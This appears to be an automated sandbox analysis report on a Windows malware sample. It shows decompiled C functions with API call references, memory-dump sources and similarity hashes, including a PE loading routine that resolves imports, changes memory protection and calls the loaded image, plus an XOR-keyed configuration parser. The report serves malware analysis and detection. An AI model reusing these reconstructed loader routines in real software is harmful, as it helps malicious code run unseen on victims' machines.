Instruction Fuzzy Hash: C4A0243104430C73D70013C37C0DF013F0CD3C0771F140010FD0C014500D7154004055

Uniqueness

Uniqueness Score: -1.00%

Function 03C41525, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C41525(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x3c4d238, 0, _a4); // executed
				return _t2;
			}

0x03c41531
0x03c41537

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 755fb91bff11e9f806cf55006182cb31ccfaf109f03bc3852b01c1a213f32ff3
Instruction ID: e3fe8179246e4d2f7be4d2975b826499ea7cfb2b39229da0a8feb283553c1101
Opcode Fuzzy Hash: 755fb91bff11e9f806cf55006182cb31ccfaf109f03bc3852b01c1a213f32ff3
Instruction Fuzzy Hash: 6CB01239000100BBCB217B10ED0CF05BB31BB50700F018110F205C407883315C60EB04

Uniqueness

Uniqueness Score: -1.00%

Function 03C43301, Relevance: 1.3, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C43301(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				int _v60;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _t35;
				void* _t40;
				void* _t49;
				void* _t51;
				int _t57;
				void* _t60;
				void* _t61;

				_t51 = _a4;
				_t57 = 0;
				_t58 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_a4 = 0;
				if(__ecx <= 0x40 ||  *__eax != 0x200) {
					L21:
					return _t57;
				} else {
					_t6 = _t58 - 0x40; // 0x3c47cd6
					_t55 =  &_v92;
					_t35 = E03C4573C(__eax,  &_v92, __edx,  &_v92,  &_v12, _t51 + _t6);
					if(_t35 != 0) {
						goto L21;
					}
					_t59 = __ecx - 0x40;
					if(_v60 > __ecx - 0x40) {
						goto L21;
					}
					while( *((char*)(_t61 + _t35 - 0x48)) == 0) {
						_t35 = _t35 + 1;
						if(_t35 < 0x10) {
							continue;
						}
						_t57 = _v60;
						_t49 = E03C41525(_t57);
						_a4 = _t49;
						_t70 = _t49;
						if(_t49 != 0) {
							_t57 = 0;
							L18:
							if(_t57 != 0) {
								goto L21;
							}
							L19:
							if(_a4 != 0) {
								E03C48B22(_a4);
							}
							goto L21;
						}
						memcpy(_t49, _t51, _t57);
						L8:
						_t60 = _a4;
						E03C45B7F(_t55, _t70, _t60, _t57,  &_v28);
						if(_v28 != _v92 || _v24 != _v88 || _v20 != _v84 || _v16 != _v80) {
							L15:
							_t57 = 0;
							goto L19;
						} else {
							 *_a8 = _t60;
							goto L18;
						}
					}
					_t40 = E03C44416(_t59, _t51,  &_a4,  &_v8,  &_v76, 0); // executed
					__eflags = _t40;
					if(_t40 != 0) {
						_t57 = _v8;
						goto L18;
					}
					_t57 = _v60;
					__eflags = _v8 - _t57;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x03c43308
0x03c4330d
0x03c4330f
0x03c43311
0x03c43314
0x03c43317
0x03c4331d
0x03c433f1
0x03c433f7
0x03c4332f
0x03c4332f
0x03c43338
0x03c4333c
0x03c43343
0x00000000
0x00000000
0x03c43349
0x03c4334f
0x00000000
0x00000000
0x03c43355
0x03c4335c
0x03c43360
0x00000000
0x00000000
0x03c43362
0x03c43366
0x03c4336b
0x03c4336e
0x03c43370
0x03c433d8
0x03c433df
0x03c433e1
0x00000000
0x00000000
0x03c433e3
0x03c433e7
0x03c433ec
0x03c433ec
0x00000000
0x03c433e7
0x03c43375
0x03c4337d
0x03c4337d
0x03c43386
0x03c43391
0x03c433d4
0x03c433d4
0x00000000
0x03c433ab
0x03c433ae
0x00000000
0x03c433ae
0x03c43391
0x03c433c3
0x03c433c8
0x03c433ca
0x03c433dc
0x00000000
0x03c433dc
0x03c433cc
0x03c433cf
0x03c433d2
0x00000000
0x00000000
0x00000000
0x03c433d2

APIs

memcpy.NTDLL(00000000,03C47D16,?,?,?,03C47D16,03C47CD6,00000002,03C47D16,03C47D16), ref: 03C43375

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 30847735ef7b42505a6b63744cc6be7ec509546649b104c9f541f4b0c8396939
Instruction ID: 1de6afde2bb8c747059b387a24538ea326d53d41286ef26e6334ead2886821cc
Opcode Fuzzy Hash: 30847735ef7b42505a6b63744cc6be7ec509546649b104c9f541f4b0c8396939
Instruction Fuzzy Hash: 0F315E7AD00148EBDF12DE96D8809EEBBBDEF80250F694055F515EB140EB709E96CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45);
				_t18 = E00401000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E004010E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401264(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E004017CB(_t42);
					L8:
					return _t29;
				}
			}

0x00401d86
0x00401d88
0x00401da4
0x00401db5
0x00401dbc
0x00401e1a
0x00000000
0x00401dbe
0x00401dbe
0x00401dc8
0x00401dcc
0x00401dd1
0x00401dd4
0x00401dd9
0x00401ddd
0x00401de2
0x00401de7
0x00401deb
0x00401df0
0x00401df1
0x00401df5
0x00401dfa
0x00401e02
0x00401e02
0x00401dfa
0x00401deb
0x00401ddd
0x00401e04
0x00401e0d
0x00401e11
0x00401e1b
0x00401e21
0x00401e21

APIs

Part of subcall function 00401000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401046
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401072
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401088
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,00401DC8,?,?,?,?,?,00401DC8,?,?,?,?,?,?,?), ref: 0040111B
Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401150

Part of subcall function 00401264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C

Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
Part of subcall function 00401BAE: GetLastError.KERNEL32 ref: 00401C62

GetLastError.KERNEL32(?,?), ref: 00401DFC

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction ID: e7e1ad0c5ae7c8012b4b43df85cfbbfbb8c05be311c934117461263c8cc71cd7
Opcode Fuzzy Hash: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction Fuzzy Hash: E811E936600301ABD721AA95CD80DEF77BCAF88318700017EFB01B7691EAB4ED0587D4

Uniqueness

Uniqueness Score: -1.00%

Function 021BC5A4, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 021BC5F5

Memory Dump Source

Source File: 00000000.00000002.510206114.00000000021B9000.00000040.00000001.sdmp, Offset: 021B9000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 18c1b822be9123f793e2b027fc796ab917e471a95162315a666d2d08728d10d0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 21112879A40208EFDB01DF98C985E99BBF5AF08350F1580A5F9489B362D371EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03C44538, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C44538(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E03C49AD9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E03C44ABF(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x03c44540
0x03c4455a
0x00000000
0x03c44576
0x03c44551
0x03c44558
0x00000000
0x00000000
0x03c4457d

APIs

lstrlenW.KERNEL32(?,?,?,03C44CF3,3D03C4C0,80000002,03C49900,03C45C8D,74666F53,4D4C4B48,03C45C8D,?,3D03C4C0,80000002,03C49900,?), ref: 03C4455D

Part of subcall function 03C44ABF: SysAllocString.OLEAUT32(03C45C8D), ref: 03C44AD8
Part of subcall function 03C44ABF: SysFreeString.OLEAUT32(00000000), ref: 03C44B19

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 16538fdfd38267e7f1515099afad0401fecb4b771e6e150f31ab5549a32e6b93
Instruction ID: 5d6e441a14da8df1d2dc3b34f7fcb300c045302466df5fa627faadaeb2e64046
Opcode Fuzzy Hash: 16538fdfd38267e7f1515099afad0401fecb4b771e6e150f31ab5549a32e6b93
Instruction Fuzzy Hash: 21F0923600020EBFDF16AF91DC05EEA3F6AEB18350F158014FA1498070DB32CAB1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C431A8, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C431A8(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E03C45008(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E03C48B22(_a4);
				}
				return _t12;
			}

0x03c431b4
0x03c431b9
0x03c431bd
0x03c431c4
0x03c431cf
0x03c431d3
0x03c431d3
0x03c431dc

APIs

Part of subcall function 03C45008: memcpy.NTDLL(00000000,00000090,00000002,00000002,03C47D16,00000008,03C47D16,03C47D16,?,03C42CE0,03C47D16), ref: 03C4503E
Part of subcall function 03C45008: memset.NTDLL ref: 03C450B4
Part of subcall function 03C45008: memset.NTDLL ref: 03C450C8

memcpy.NTDLL(00000002,03C47D16,00000000,00000002,03C47D16,03C47D16,03C47D16,?,03C42CE0,03C47D16,?,03C47D16,00000002,?,?,03C4312C), ref: 03C431C4

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 989c999fc0c51ab1d283bc4cbf1d70629d79e8704cf8a32afcb90a7e9d5a9ca2
Instruction ID: ae087122d052ac90af4aee4d714132c18aea022459e40bddd8d0f00810de98ba
Opcode Fuzzy Hash: 989c999fc0c51ab1d283bc4cbf1d70629d79e8704cf8a32afcb90a7e9d5a9ca2
Instruction Fuzzy Hash: 23E0867A50021877CB126A95EC00DEFBF5DDF57591F054014FD08DD100D632D610A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 0042E860, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000000,01FB4264,0042F91D), ref: 0042E868

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6ab0161bfefd437a20ddbe053c0e8d1237d35f6ed2e8b1e3e2647fe4d8693702
Instruction ID: 1082e23bad518103b1123063954fd69cd4cd886f9d9f1dc849bef0f01864b8ae
Opcode Fuzzy Hash: 6ab0161bfefd437a20ddbe053c0e8d1237d35f6ed2e8b1e3e2647fe4d8693702
Instruction Fuzzy Hash: 26B012B06063149FD7108F50EFC9B1037A4F34C302F000010F652D526DC73004009B14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03C47FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E03C47FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x3c4d2d8 = _v8;
				}
				_t33 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x3c4d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x3c4d2a4; // 0x69b25f44
						_t45 = E03C49403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x3c4d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x3c4d2a4; // 0x69b25f44
						_t46 = E03C49403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x3c4d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x3c4d2a4; // 0x69b25f44
						_t47 = E03C49403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x3c4d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x3c4d2a4; // 0x69b25f44
						_t48 = E03C49403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x3c4d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x3c4d2a4; // 0x69b25f44
						_t49 = E03C49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x3c4d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x3c4d2a4; // 0x69b25f44
						_t50 = E03C49403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x3c4d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x3c4d2a4; // 0x69b25f44
								_t51 = E03C49403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E03C4A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E03C49FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x3c4d2a4; // 0x69b25f44
								_t52 = E03C49403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E03C4A0FD(0, _t52) != 0) {
								_t121 =  *0x3c4d32c; // 0x48f95b0
								E03C41128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x3c4d2a4; // 0x69b25f44
								_t53 = E03C49403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x3c4d2a8; // 0xcaa5a8
								_t22 = _t54 + 0x3c4e252; // 0x616d692f
								 *0x3c4d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E03C4A0FD(0, _t53);
								 *0x3c4d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x3c4d2a4; // 0x69b25f44
										_t56 = E03C49403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x3c4d2a8; // 0xcaa5a8
										_t23 = _t57 + 0x3c4e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E03C4A0FD(0, _t56);
									}
									 *0x3c4d340 = _t58;
									HeapFree( *0x3c4d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x03c47fbe
0x03c47fc1
0x03c47fe1
0x03c47fef
0x03c47fef
0x03c47ff4
0x03c4800e
0x03c48276
0x03c4827d
0x03c48284
0x03c48284
0x03c48014
0x03c48030
0x03c48264
0x03c4826e
0x00000000
0x03c48036
0x03c48036
0x03c4803b
0x03c48051
0x03c4803d
0x03c4803d
0x03c4804a
0x03c4804a
0x03c4805b
0x03c4805d
0x03c48067
0x03c4806c
0x03c4806c
0x03c48067
0x03c48073
0x03c48089
0x03c48075
0x03c48075
0x03c48082
0x03c48082
0x03c4808d
0x03c4808f
0x03c48099
0x03c4809e
0x03c4809e
0x03c48099
0x03c480a5
0x03c480bb
0x03c480a7
0x03c480a7
0x03c480b4
0x03c480b4
0x03c480bf
0x03c480c1
0x03c480cb
0x03c480d0
0x03c480d0
0x03c480cb
0x03c480d7
0x03c480ed
0x03c480d9
0x03c480d9
0x03c480e6
0x03c480e6
0x03c480f1
0x03c480f3
0x03c480fd
0x03c48102
0x03c48102
0x03c480fd
0x03c48109
0x03c4811f
0x03c4810b
0x03c4810b
0x03c48118
0x03c48118
0x03c48123
0x03c48125
0x03c4812f
0x03c48134
0x03c48134
0x03c4812f
0x03c4813b
0x03c48151
0x03c4813d
0x03c4813d
0x03c4814a
0x03c4814a
0x03c48155
0x03c48168
0x03c48168
0x00000000
0x03c48157
0x03c48157
0x03c48161
0x00000000
0x03c48172
0x03c48172
0x03c48174
0x03c4818a
0x03c48176
0x03c48176
0x03c48183
0x03c48183
0x03c4818e
0x03c48190
0x03c48193
0x03c48194
0x03c4819b
0x03c4819d
0x03c4819e
0x03c4819e
0x03c4819b
0x03c481a5
0x03c481bb
0x03c481a7
0x03c481a7
0x03c481b4
0x03c481b4
0x03c481bf
0x03c481cd
0x03c481d7
0x03c481d7
0x03c481de
0x03c481f4
0x03c481e0
0x03c481e0
0x03c481ed
0x03c481ed
0x03c481f8
0x03c4820b
0x03c4820b
0x03c48210
0x03c48216
0x00000000
0x03c481fa
0x03c481fd
0x03c48202
0x03c48209
0x03c4821b
0x03c4821d
0x03c48233
0x03c4821f
0x03c4821f
0x03c4822c
0x03c4822c
0x03c48237
0x03c48243
0x03c48248
0x03c48248
0x03c48239
0x03c4823c
0x03c4823c
0x03c48256
0x03c4825b
0x03c48261
0x00000000
0x03c48261
0x00000000
0x03c48209
0x03c481f8
0x03c48161
0x03c48155

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C48063
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C48095
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C480C7
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C480F9
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C4812B
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C4815D
HeapFree.KERNEL32(00000000,03C430F3,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008,?,03C430F3), ref: 03C4825B
HeapFree.KERNEL32(00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008,?,03C430F3), ref: 03C4826E

Part of subcall function 03C4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,03C430F3,03C48241,00000000,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005), ref: 03C4A106
Part of subcall function 03C4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,03C430F3), ref: 03C4A129
Part of subcall function 03C4A0FD: memset.NTDLL ref: 03C4A138

Strings

Ut, xrefs: 03C4825B, 03C4826E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID: Ut
API String ID: 3442150357-8415677
Opcode ID: 78a0e7ec8300640012a2b8434399dca93707a0e031c0b5c9edd633c435adaa29
Instruction ID: 0ea5a1525f72c63b527063d207198256e4e3e66c08745dfee162aca4ae146b1e
Opcode Fuzzy Hash: 78a0e7ec8300640012a2b8434399dca93707a0e031c0b5c9edd633c435adaa29
Instruction Fuzzy Hash: 9D816778A10715AFCB21FBB8DD88E5BB7FDDB486007290956E406DB209E737EE419720

Uniqueness

Uniqueness Score: -1.00%

Function 00401752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x4030f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4030fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x4030ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4030e8 = _t5;
						 *0x4030f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4030e4 = _t6;
						if(_t6 == 0) {
							 *0x4030e4 =  *0x4030e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401753
0x00401761
0x00401767
0x0040176e
0x004017c5
0x004017c5
0x00401770
0x00401778
0x00401785
0x00401785
0x004017c1
0x004017c3
0x00000000
0x00000000
0x00000000
0x0040177a
0x00401781
0x00401787
0x00401787
0x0040178c
0x0040179a
0x0040179f
0x004017a5
0x004017ab
0x004017b2
0x004017b4
0x004017b4
0x004017be
0x00401783
0x00401783
0x00000000
0x00401783
0x00401781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
GetVersion.KERNEL32 ref: 00401770
GetCurrentProcessId.KERNEL32 ref: 0040178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction ID: de110183062e86dcac6d67db381f44f5737484f963d514ed7bd2dcac5e25d41b
Opcode Fuzzy Hash: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction Fuzzy Hash: BDF01D306813129BE6119F647F19B953B69A705712F108136FA02F62E4E7B58541CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 03C4836E, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E03C4836E(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
